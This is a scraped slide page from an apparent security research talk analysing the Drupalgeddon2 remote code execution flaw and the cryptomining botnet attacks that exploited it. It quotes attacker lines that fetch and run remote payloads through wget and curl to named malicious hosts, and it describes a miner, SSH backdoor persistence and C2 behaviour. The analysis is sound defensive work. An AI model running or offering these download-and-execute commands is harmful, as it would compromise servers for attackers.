Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Neo4j
 
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024BookNet Canada
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsPrecisely
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 

Recently uploaded (20)

Bluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfBluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdf
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDG
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024
 
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
 
The transition to renewables in India.pdf
The transition to renewables in India.pdfThe transition to renewables in India.pdf
The transition to renewables in India.pdf
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power Systems
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 

Drupalgeddon2 Attack Analysis

  • 1. 1© 2017 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DRUPALGEDDON2 – YET ANOTHER WEAPON FOR THE ATTACKER Radu - Emanuel Chișcariu, Security Research Engineer
  • 2. 3© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DRUPALGEDDON2 (CVE-2018-7600) • Remote Code Execution • Over HTTP • Identified by Drupal Security Team Affected versions: 7.x up to 7.58 8.x up to 8.3.9 8.4.x up to 8.4.6 8.5.x up to 8.5.1 TLDR: all of them
  • 3. 4© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | FOLLOW-UP: DRUPALGEDDON3 (CVE-2018-7602) • (Authenticated) Remote Code Execution • Over HTTP • Identified by Drupal Security Team Affected versions: 7.x up to 7.59 8.x up to 8.4.8 8.5.x up to 8.5.3
  • 4. 5© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | ATTACK TIMELINE
  • 5. 6© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | ATTACK TIMELINE
  • 6. 7© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | ATTACK TIMELINE
  • 7. 8© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | ATTACK TIMELINE
  • 8. 9© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DRUPAL : CORE FUNCTIONALITY • Form API • Renderable Arrays • Properties : • array key , "#" prefixed • Form elements • no prefix on array keys
  • 9. 10© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | What happens with an user request? Client Request param/value pairs Form_array => $elements doRender() - callbacks DRUPAL : CORE FUNCTIONALITY ● User request => create renderable arrays of components ● Callback functions invoked during rendering
  • 10. 11© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | Where is the vulnerability? DRUPALGEDDON2 : VULNERABLE CODE User request => components rendered by doRender()
  • 11. 12© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | Where is the entry point? DRUPALGEDDON2 : VULNERABLE CODE
  • 12. 13© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | PoC is publicly available DRUPALGEDDON2 - EXPLOIT
  • 13. 14© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | How did the Drupal Team patched the vulnerability? DRUPALGEDDON2 - PATCH A CRITICAL SECURITY update : "adding input sanitization"
  • 14. 15© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | ACTIVITY IN THE WILD What was the malicious activity? 11 events: Saturday, April, 14, 2018 637 events: Saturday, April, 21, 2018 1609 events: Monday, May, 7, 2018
  • 15. 16© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | ACTIVITY IN THE WILD
  • 16. 17© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | HOW DO THE ATTACKS LOOK LIKE? ● Sample #1 : PHP Agent # wget http://igaqd.hide-yoshi.net/mimetypes.php
  • 17. 18© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | SAMPLE #1 : OBFUSCATED PHP AGENT
  • 18. 19© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | SAMPLE #1 : PHP FILE UPLOADER
  • 19. 20© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | # curl -fsSL http://chrome.zer0day.ru:5050/mrx1 -o /tmp/yum.lock && sh /tmp/yum.lock SAMPLE #2: SHELL SCRIPT
  • 20. 21© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | NO HONOR AMONGST THIEVES.
  • 21. 22© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DEPENDENCIES
  • 22. 23© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | SSH BACKDOOR
  • 23. 24© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | START THE MINER AND PROFIT!
  • 24. 25© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | FURTHER INSPECTION /tmp/migrations : /tmp/migrations -o pool.zer0day.ru:8080 -k -B /tmp/clay: executed directly
  • 25. 26© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | LET’S CHECK THE MIGRATIONS FILE
  • 26. 27© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | Dependencies
  • 27. 28© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DependenciesMONERO FOR THE WIN!
  • 28. 29© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | FURTHER INSPECTION We saw the /tmp/migrations file. What about the /tmp/clay ?
  • 29. 30© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
  • 30. 31© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | THOSE BOTNET DIRECTIVES.
  • 31. 32© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | MAIN ● Anti-debugging ● Backdoor
  • 32. 33© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | BACKDOOR MainBeikong() - /tmp/bill.lock -> /etc/init.d/ - /tmp/gates.lod -> PID of trojan, -> netstat, load, ps - /tmp/moni.lod -> /proc/cpuinfo MainMonitor() - C2 communication MainBackdoor() - start as daemon() - more resilient replication
  • 33. 34© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | SO ONE MORE MINER AND SLAVE FOR BOTNET!
  • 34. 35© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | WHAT HAVE WE LEARNED? ● Security through obscurity won’t work ● Hard release deadlines makes you write bad code ● Input sanitization doesn’t ever get old Link for the full article: @adur_cre
  • 35. 36© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |

Editor's Notes

  1. My name Positon Web application vulnerability that appeared this year
  2. RCE A lot of articles appeared starting with 16th April It seemed to affect all versions of Drupal
  3. Moreover after two weeks or so Another wave of attacks after patch What happened User with limited permissions Interact with a confirmation form ()
  4. Fisrt patch 21 march
  5. Then It came the sec advis ( responsible disclosure)
  6. Then It came the public poc
  7. But a diff thing happened the second wave of attack First it came the exploit Then the patch and sec advisory, same day Full disclosure, The inpact seemed to be over 1 mil websites
  8. Before going through the vulnerable code,, Form API in processing and presenting forms. Building blocks : renderable arrays Map keys to HTML TAGS
  9. So what hap when The outcome of the rend
  10. Looking at the vulnerable code doRender takes care of the rendering resource requested by client It contains logic that, with respect to will render the page the form properties within the $elements array The form properties within the elements array will affect the rendering process
  11. The managed File. builds an AJAX response using the uploadAjaxCallback() function Looking at the vulnerable code doRender takes care of the rendering resource requested by client It contains logic that, with respect to will render the page the form properties within the $elements array The form properties within the elements array will affect the rendering process
  12. Filter all items starting with a hash sign they applied a general .. stripDangerousValues … hash sign This method sanitizes input data in $_GET, $_POST & $_COOKIES during the very early stages of Drupal’s bootstrap (immediately after loading the site configurations).
  13. 2 days after Cumulating The max number
  14. Our honeypots also report the source… Of course, It seems that
  15. - Terminate other mining process if found on the machine
  16. Install dependencies Ensure persistence with cron jobs
  17. Ensure attacker access by adding an authorized ssh key as a backdor, then download some resouces
  18. star
  19. Looking at the strings … Also, the found ip are reported
  20. collects relevant information about the system